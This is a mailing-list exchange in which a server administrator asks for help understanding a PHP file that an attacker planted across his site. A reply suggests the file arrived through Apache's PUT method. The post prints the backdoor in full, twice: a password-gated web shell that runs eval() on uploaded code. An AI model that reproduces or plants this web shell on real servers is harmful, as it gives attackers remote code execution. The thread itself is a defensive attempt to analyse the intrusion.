Al wrote:
I'm still fighting my hack problem on one of my servers. Can anyone help
me figure out what's the purpose of this code. The hack places this
file in numerous dirs on the site, I assume using a php script because
the owner is "nobody".
I can sort of figure what is doing; but, I can't figure out what the
hacker is using it for.
Incidentally, I've changed all passwords and restricted ftp to two
people. I see no sign that any code is written with by site owner, i.e,
ftp. And, I've looked carefully for suspect php files.
<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) {
echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); };
echo "<pre>"; testdata('start'); if
(md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code =
@fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); };
testdata('end'); echo "</pre>"; ?>
<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
echo "$t\n";
} ;
function testdata($t)
{
say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],
"rb"), $HTTP_POST_FILES["f"]["size"]))
{
eval($code);
} else
{
testdata('f');
} ;
} else
{
testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>
Don't always assume it is PHP. Is Apache running as nobody? If so, it could be
Apache using the PUT method to place the file in a writable directory.
--
Jim Lucas
"Some men are born to greatness, some achieve greatness,
and some have greatness thrust upon them."
Twelfth Night, Act II, Scene V
by William Shakespeare
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
